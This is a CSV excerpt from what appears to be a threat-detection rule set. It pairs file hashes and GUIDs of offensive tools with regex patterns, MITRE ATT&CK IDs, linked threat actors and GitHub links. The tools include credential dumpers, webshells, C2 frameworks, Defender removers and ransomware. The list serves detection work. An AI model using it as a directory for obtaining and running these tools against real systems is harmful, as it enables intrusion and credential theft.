"*83d99bedd82a5ddf6a8965fbc47b48eb05afb773926f5b781dcbaea39aaae048*",".{0,1000}83d99bedd82a5ddf6a8965fbc47b48eb05afb773926f5b781dcbaea39aaae048.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","30145"
"*83da7d9d86d928f9c0d2366663a04156ba92932b75b51ec53339fa67eaa87ebb*",".{0,1000}83da7d9d86d928f9c0d2366663a04156ba92932b75b51ec53339fa67eaa87ebb.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30146"
"*83dcafd146a5581427747c502219d9dd3c349ef673689c02c0ca2325256d3490*",".{0,1000}83dcafd146a5581427747c502219d9dd3c349ef673689c02c0ca2325256d3490.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30147"
"*83dd381d2122ba8b3552661dae64d149b4bcdcc9f7725b482574fd617db2ddff*",".{0,1000}83dd381d2122ba8b3552661dae64d149b4bcdcc9f7725b482574fd617db2ddff.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30148"
"*83dd7c7738c5409a2f50d06f38eb82be09a232794771c87d81080220e6ab5195*",".{0,1000}83dd7c7738c5409a2f50d06f38eb82be09a232794771c87d81080220e6ab5195.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30149"
"*83DF0D0B-8FC6-4BCA-9982-4D26523515A2*",".{0,1000}83DF0D0B\-8FC6\-4BCA\-9982\-4D26523515A2.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30150"
"*83e20b2fc8347cb5765a8c622ce59806a900f735088c3c9a385676f4e01849ce*",".{0,1000}83e20b2fc8347cb5765a8c622ce59806a900f735088c3c9a385676f4e01849ce.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30151"
"*83eb1e6bfd9d2a628878a82e570af36c4ed59ed06763437a1f957b8cd9799005*",".{0,1000}83eb1e6bfd9d2a628878a82e570af36c4ed59ed06763437a1f957b8cd9799005.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30153"
"*83fec07c6e99a2087901e94461dc9cf9650c9165040c27f6cd2b98a14af320a8*",".{0,1000}83fec07c6e99a2087901e94461dc9cf9650c9165040c27f6cd2b98a14af320a8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30155"
"*84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c*",".{0,1000}84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30157"
"*8401c11807fda1838139211517f0aee7ed7198e237b7fd87deceb23e092f1552*",".{0,1000}8401c11807fda1838139211517f0aee7ed7198e237b7fd87deceb23e092f1552.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","30158"
"*8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b*",".{0,1000}8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30160"
"*84074bcee24f8ee02ce2011e88471d900bc85cace4967b1273c634a7dba5496b*",".{0,1000}84074bcee24f8ee02ce2011e88471d900bc85cace4967b1273c634a7dba5496b.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","30161"
"*84075d23f3358b16e1f68b1eb56d34d34e88da9b29d504d36b5de2522cf6c23f*",".{0,1000}84075d23f3358b16e1f68b1eb56d34d34e88da9b29d504d36b5de2522cf6c23f.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#filehash","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","30162"
"*8407636b032bed867e4fe3f13d31292e55de7183947c5c2b6c8fe984231f76c8*",".{0,1000}8407636b032bed867e4fe3f13d31292e55de7183947c5c2b6c8fe984231f76c8.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30163"
"*840783103a165accdcc4f1ce1e2239edbe4491cf0599700827bd773499c9d17b*",".{0,1000}840783103a165accdcc4f1ce1e2239edbe4491cf0599700827bd773499c9d17b.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30164"
"*840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4*",".{0,1000}840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30165"
"*8411c83668a5bcdf0429fdc06ee58ebd41bbd537392f2979e3bcbbe2afcf860b*",".{0,1000}8411c83668a5bcdf0429fdc06ee58ebd41bbd537392f2979e3bcbbe2afcf860b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30166"
"*841f439c8f42ffe1fa88303a9d7fd8268b6cdf9dd8b91704ba2dd8a7b8f813a3*",".{0,1000}841f439c8f42ffe1fa88303a9d7fd8268b6cdf9dd8b91704ba2dd8a7b8f813a3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","30167"
"*8423e2a9ddc243b82a1c52dd9b76d97bf4196c8da044bdb2fb06af6c1ecc4e95*",".{0,1000}8423e2a9ddc243b82a1c52dd9b76d97bf4196c8da044bdb2fb06af6c1ecc4e95.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30168"
"*8425D05F-F3F4-4132-9BE1-BED752685333*",".{0,1000}8425D05F\-F3F4\-4132\-9BE1\-BED752685333.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","30169"
"*84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289*",".{0,1000}84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30170"
"*843053c1c1b36afc067f792748061dd1513252038e2dbe71dddc618bf9c11394*",".{0,1000}843053c1c1b36afc067f792748061dd1513252038e2dbe71dddc618bf9c11394.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30171"
"*8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038*",".{0,1000}8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30173"
"*8443F171-603C-499C-B6A6-F4F6910FD1D9*",".{0,1000}8443F171\-603C\-499C\-B6A6\-F4F6910FD1D9.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#GUIDProject","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","30177"
"*844405c37fe6e576573b01a4384120e7837d20ee2deb849eedd9d6a966b046f4*",".{0,1000}844405c37fe6e576573b01a4384120e7837d20ee2deb849eedd9d6a966b046f4.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","30178"
"*844d9edc-57ad-4fcc-9fd5-77a69d4bf569*",".{0,1000}844d9edc\-57ad\-4fcc\-9fd5\-77a69d4bf569.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#GUIDproject","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","30179"
"*845cd5a8ab75cc81e6048537fb516fb92e50b586d67927d7be9fc10a620d7025*",".{0,1000}845cd5a8ab75cc81e6048537fb516fb92e50b586d67927d7be9fc10a620d7025.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30182"
"*845cf04a125d951c0b3f70f2c669b3b1277c3b8c4c02fb91fc35e84581f409d1*",".{0,1000}845cf04a125d951c0b3f70f2c669b3b1277c3b8c4c02fb91fc35e84581f409d1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30183"
"*845d0a088eac7562b0992bc11ad8d6d9b178ce4db581506632051cc2a6d8a782*",".{0,1000}845d0a088eac7562b0992bc11ad8d6d9b178ce4db581506632051cc2a6d8a782.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30184"
"*845e930b1479640235d571dceb63d0b3df3f807ab09eb0f53159b043a2e20e23*",".{0,1000}845e930b1479640235d571dceb63d0b3df3f807ab09eb0f53159b043a2e20e23.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","30185"
"*8464129299b636de1a2a86eb3b7a1f1cbd577f50eb5e3758a7ded72c5d497f15*",".{0,1000}8464129299b636de1a2a86eb3b7a1f1cbd577f50eb5e3758a7ded72c5d497f15.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30187"
"*8464ed2d9649b14feb34c3289cf026bfab930e132d0876b3be5cc1a50cbfc966*",".{0,1000}8464ed2d9649b14feb34c3289cf026bfab930e132d0876b3be5cc1a50cbfc966.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30188"
"*846994e23ac384d930d24bc63ad2094bf6565a7ece8a14858d256124a5bfa817*",".{0,1000}846994e23ac384d930d24bc63ad2094bf6565a7ece8a14858d256124a5bfa817.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","30189"
"*846f9e23af79dc84df9d197037e933dbf6b2bf068d4406bc7b3289cf516f71c5*",".{0,1000}846f9e23af79dc84df9d197037e933dbf6b2bf068d4406bc7b3289cf516f71c5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30190"
"*8478fe6c22a45230e79b057d13439a7ebc0e1a5054d14abbd3c8317add565a40*",".{0,1000}8478fe6c22a45230e79b057d13439a7ebc0e1a5054d14abbd3c8317add565a40.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","30191"
"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*",".{0,1000}847D29FF\-8BBC\-4068\-8BE1\-D84B1089B3C0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","30192"
"*847d58dd3d25b7bab471a9105a7e7eef60cafa788e4942f37e87ccf4c740da5f*",".{0,1000}847d58dd3d25b7bab471a9105a7e7eef60cafa788e4942f37e87ccf4c740da5f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30193"
"*847ff5d91e3c34f2e446ee6f6e2c76c9aafc25c76b031c9f8f45193840571176*",".{0,1000}847ff5d91e3c34f2e446ee6f6e2c76c9aafc25c76b031c9f8f45193840571176.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30194"
"*8484a8848d429d954636f8c6c170bdd73d96288325b902eb43c3403f0650b5e6*",".{0,1000}8484a8848d429d954636f8c6c170bdd73d96288325b902eb43c3403f0650b5e6.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","30195"
"*8489A9CE-AB1A-4D8D-8824-D9E18B9945FE*",".{0,1000}8489A9CE\-AB1A\-4D8D\-8824\-D9E18B9945FE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","30196"
"*848D3E89D46E285D5BCFA7FD13E805ABCB8BAE926F7F1B40092EA56F4A025CAA*",".{0,1000}848D3E89D46E285D5BCFA7FD13E805ABCB8BAE926F7F1B40092EA56F4A025CAA.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/anthonysecurity/redteam_toolkit/blob/master/References/PowerView-2.0-tricks.ps1","1","0","#filehash","https://vx-underground.org/Archive/Dispossessor%20Leaks","10","1","24","19","2018-08-23T11:18:21Z","2018-02-07T16:29:53Z","30197"
"*8492e696c691cd0893990f2496f827632345c6c278f4503455e996ff30a8f185*",".{0,1000}8492e696c691cd0893990f2496f827632345c6c278f4503455e996ff30a8f185.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30198"
"*8493D0F0-CA01-4C5A-A6E3-C0F427966ABD*",".{0,1000}8493D0F0\-CA01\-4C5A\-A6E3\-C0F427966ABD.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","30199"
"*849e89c51512e60426cd9ec659040cb18bbb49a31d463510f176d550b207acad*",".{0,1000}849e89c51512e60426cd9ec659040cb18bbb49a31d463510f176d550b207acad.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30200"
"*84A7E50E-B0F0-4B3D-98CD-F32CDB1EB8CA*",".{0,1000}84A7E50E\-B0F0\-4B3D\-98CD\-F32CDB1EB8CA.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#GUIDproject","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","30202"
"*84af149e112b1d379f2c8cc7261bf8fda864e2f3f37f0523274383c7c403ca0a*",".{0,1000}84af149e112b1d379f2c8cc7261bf8fda864e2f3f37f0523274383c7c403ca0a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30203"
"*84b362a32522fdce071c44b305d146d1e10fbc86641431914c4b4b20d00c8ac0*",".{0,1000}84b362a32522fdce071c44b305d146d1e10fbc86641431914c4b4b20d00c8ac0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30204"
"*84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041*",".{0,1000}84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30205"
"*84ba0c573d8037b6ffefaecf7aee506624382ade184e884e3c03dae8c1f33317*",".{0,1000}84ba0c573d8037b6ffefaecf7aee506624382ade184e884e3c03dae8c1f33317.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30208"
